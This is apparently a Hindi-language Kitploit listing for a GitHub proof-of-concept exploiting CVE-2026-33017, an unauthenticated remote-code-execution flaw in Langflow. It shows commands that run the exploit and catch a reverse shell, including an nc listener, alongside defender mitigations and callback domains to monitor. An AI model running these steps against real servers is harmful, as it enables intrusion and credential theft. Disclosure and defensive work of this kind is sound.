Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-33017-Langflop — CVE-2026-33017 Langflow RCE PoC | Kitploit
उपकरण/GitHubGitHub/tatosec/cve-2026-33017-langflop
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubtatosec/cve-2026-33017-langflop

CVE-2026-33017-Langflop

CVE-2026-33017 Langflow RCE PoC

रिपॉजिटरी देखें
15 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-33017 Langflow ("Langflop") बिना प्रमाणीकरण वाला RCE PoC

Langflow में बिना प्रमाणीकरण वाली build_public_tmp कोड-निष्पादन खामी के लिए PoC। यह एक दुर्भावनापूर्ण घटक को सार्वजनिक flow पर अपलोड करता है, build ट्रिगर करता है, और reverse shell पकड़ता है।

केवल अधिकृत सुरक्षा परीक्षण के लिए। केवल उन्हीं सिस्टमों पर उपयोग करें जिनके आप स्वामी हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है।

आवश्यकताएँ

  • Python 3
  • requests (pip install requests)

उपयोग

अंतर्निहित listener चलाएँ और exploit को एक ही बार में दागें:

root@kitploit:~
python3 poc.py \
  --url https://target:7860 \
  --flow-id <public-flow-uuid> \
  --lhost <your-ip> \
  --lport 4444 \
  --listen

जब shell कनेक्ट होता है, तो यह स्वचालित रूप से पूर्ण इंटरैक्टिव shell में अपग्रेड करने का प्रयास करता है।

यदि आप अपना खुद का listener उपयोग करना चाहें (जैसे nc -lvnp 4444), तो --listen हटा दें:

root@kitploit:~
python3 poc.py --url https://target:7860 --flow-id <uuid> --lhost <your-ip> --lport 4444

विकल्प

जानकारी

CVE-2026-33017, Langflow के POST /api/v1/build_public_tmp/{flow_id}/flow endpoint में एक बिना प्रमाणीकरण वाला RCE है, जो बिना sandboxing के flow node परिभाषाओं से हमलावर द्वारा आपूर्ति किया गया Python निष्पादित करता है। अधिक जानने के लिए नीचे दिए गए संसाधन देखें:

  • Sysdig Threat Research लेख: CVE-2026-33017: हमलावरों ने 20 घंटों में Langflow AI पाइपलाइनों से कैसे समझौता किया
  • NVD: CVE-2026-33017

अनुशंसाएँ (रक्षक)

Sysdig Threat Research लेख से शमन उपाय:

  • अपडेट करें Langflow को तुरंत। यदि पैच किया गया संस्करण अभी उपलब्ध नहीं है, तो /api/v1/build_public_tmp endpoint तक नेटवर्क पहुँच प्रतिबंधित करें या सार्वजनिक flow निर्माण पूरी तरह अक्षम कर दें।
  • ऑडिट करें किसी भी सार्वजनिक रूप से एक्सपोज़्ड Langflow इंस्टेंस पर environment variables और secrets। एहतियात के तौर पर API कुंजियाँ, डेटाबेस पासवर्ड और क्लाउड क्रेडेंशियल्स रोटेट करें।
  • निगरानी करें असामान्य पोर्ट्स या ज्ञात कॉलबैक सेवाओं (oastify.com, interact.sh, dnslog.cn) के लिए आउटबाउंड कनेक्शनों की, जो सक्रिय शोषण और डेटा बहिर्गमन का संकेत देते हैं।
  • प्रतिबंधित करें Langflow इंस्टेंसों तक नेटवर्क पहुँच को फ़ायरवॉल नियमों या प्रमाणीकरण वाले reverse proxy का उपयोग करके। !!प्रमाणीकरण परत के बिना Langflow को सीधे इंटरनेट पर एक्सपोज़ नहीं किया जाना चाहिए!!
  • सूचीबद्ध करें अपने environment में AI/ML टूलिंग की। Langflow, n8n और अन्य workflow ऑटोमेशन टूल जैसे प्लेटफ़ॉर्म तेजी से निशाना बनाए जा रहे हैं क्योंकि वे अक्सर व्यापक API पहुँच के साथ चलते हैं और मानक सुरक्षा समीक्षा प्रक्रियाओं के बाहर तैनात किए जाते हैं।

अस्वीकरण

यह टूल शोध और अधिकृत पैठ परीक्षण के लिए प्रदान किया गया है। लेखक दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।

टूल डाउनलोड करें
फ़्लैगविवरण
--urlलक्ष्य Langflow सर्वर URL (आवश्यक)
--flow-idसाझा सार्वजनिक flow का UUID (आवश्यक)
--lhostReverse shell कॉलबैक IP (आवश्यक)
--lportReverse shell कॉलबैक पोर्ट (आवश्यक)
--listenअंतर्निहित listener चलाएँ
--timeoutHTTP अनुरोध टाइमआउट सेकंड में (डिफ़ॉल्ट 30)
-k, --insecureTLS प्रमाणपत्र सत्यापन अक्षम करें (self-signed / समाप्त हो चुके प्रमाणपत्र)
--no-upgradeस्वचालित TTY अपग्रेड छोड़ें, बुनियादी लाइन shell का उपयोग करें